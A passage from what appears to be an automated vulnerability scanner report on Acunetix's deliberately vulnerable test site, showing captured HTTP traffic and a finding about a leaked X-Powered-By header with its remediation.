6uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        33. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
